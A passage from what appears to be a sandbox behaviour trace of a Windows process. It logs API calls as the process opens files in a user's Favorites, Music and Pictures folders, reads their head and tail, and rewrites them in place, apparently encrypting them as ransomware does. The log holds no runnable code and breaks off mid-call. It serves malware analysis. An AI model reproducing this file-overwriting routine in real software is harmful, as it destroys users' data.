lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.223] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.223] CloseHandle (hObject=0x1cc) returned 1 [0187.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.224] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.224] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xec [0187.224] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.224] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.224] ReleaseMutex (hMutex=0x168) returned 1 [0187.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Suggested Sites.url", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0187.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Suggested Sites.url", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Suggested Sites.url", lpUsedDefaultChar=0x0) returned 19 [0187.224] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xec, lpOverlapped=0x0) returned 1 [0187.225] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.225] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x674, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x674, lpOverlapped=0x0) returned 1 [0187.226] CloseHandle (hObject=0x1cc) returned 1 [0187.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x85 [0187.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.713] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.713] ReleaseMutex (hMutex=0x168) returned 1 [0187.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0187.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Entertainment.url", lpUsedDefaultChar=0x0) returned 21 [0187.714] ReadFile (in: hFile=0x1cc, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2e9f2bc*=0x85, lpOverlapped=0x0) returned 1 [0187.715] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.715] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0187.869] CloseHandle (hObject=0x1cc) returned 1 [0187.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0187.991] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.992] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x85 [0187.992] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.992] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.992] ReleaseMutex (hMutex=0x168) returned 1 [0187.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Spaces.url", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0187.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Spaces.url", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Spaces.url", lpUsedDefaultChar=0x0) returned 23 [0187.992] ReadFile (in: hFile=0x214, lpBuffer=0x2673508, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673508*, lpNumberOfBytesRead=0x2e9f2bc*=0x85, lpOverlapped=0x0) returned 1 [0187.993] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.993] WriteFile (in: hFile=0x214, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0187.994] CloseHandle (hObject=0x214) returned 1 [0187.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\9dHpE5\\rx80UyUKMa8w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\9dhpe5\\rx80uyukma8w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0187.995] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.995] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x13a9d [0187.995] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.995] ReleaseMutex (hMutex=0x168) returned 1 [0187.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rx80UyUKMa8w.m4a", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0187.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rx80UyUKMa8w.m4a", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rx80UyUKMa8w.m4a", lpUsedDefaultChar=0x0) returned 16 [0187.995] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.996] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12a9d [0187.996] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.997] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12a9d [0187.997] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.997] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.998] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.998] CloseHandle (hObject=0x214) returned 1 [0187.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\dz2ObyGZvdzF-W.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\dz2obygzvdzf-w.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0187.999] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.999] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x17664 [0187.999] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.999] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.999] ReleaseMutex (hMutex=0x168) returned 1 [0187.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dz2ObyGZvdzF-W.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0187.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dz2ObyGZvdzF-W.wav", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dz2ObyGZvdzF-W.wav", lpUsedDefaultChar=0x0) returned 18 [0188.000] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.001] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16664 [0188.001] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.001] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16664 [0188.001] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.001] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.002] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.002] CloseHandle (hObject=0x214) returned 1 [0188.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\oB8jIwuMDGLJy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\ob8jiwumdgljy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.003] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.003] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x664a [0188.003] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.003] ReleaseMutex (hMutex=0x168) returned 1 [0188.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oB8jIwuMDGLJy.mp3", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oB8jIwuMDGLJy.mp3", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oB8jIwuMDGLJy.mp3", lpUsedDefaultChar=0x0) returned 17 [0188.003] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.004] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x564a [0188.005] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.005] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x564a [0188.005] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.005] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.005] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0188.006] CloseHandle (hObject=0x214) returned 1 [0188.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_6cxb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_6cxb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.007] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.007] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x560d [0188.007] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.007] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.007] ReleaseMutex (hMutex=0x168) returned 1 [0188.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_6cxb.wav", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0188.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_6cxb.wav", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_6cxb.wav", lpUsedDefaultChar=0x0) returned 9 [0188.007] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.008] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x460d [0188.008] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.008] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x460d [0188.009] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.009] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.009] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0188.009] CloseHandle (hObject=0x214) returned 1 [0188.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.010] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.010] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1f8 [0188.010] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.010] ReleaseMutex (hMutex=0x168) returned 1 [0188.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0188.010] ReadFile (in: hFile=0x214, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0188.011] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0188.012] WriteFile (in: hFile=0x214, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x780, lpOverlapped=0x0) returned 1 [0188.012] CloseHandle (hObject=0x214) returned 1 [0188.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zm4Vpz_XGaxzE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zm4vpz_xgaxze.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.013] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.013] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa709 [0188.013] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.013] ReleaseMutex (hMutex=0x168) returned 1 [0188.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zm4Vpz_XGaxzE.png", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zm4Vpz_XGaxzE.png", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Zm4Vpz_XGaxzE.png", lpUsedDefaultChar=0x0) returned 17 [0188.014] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.015] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: 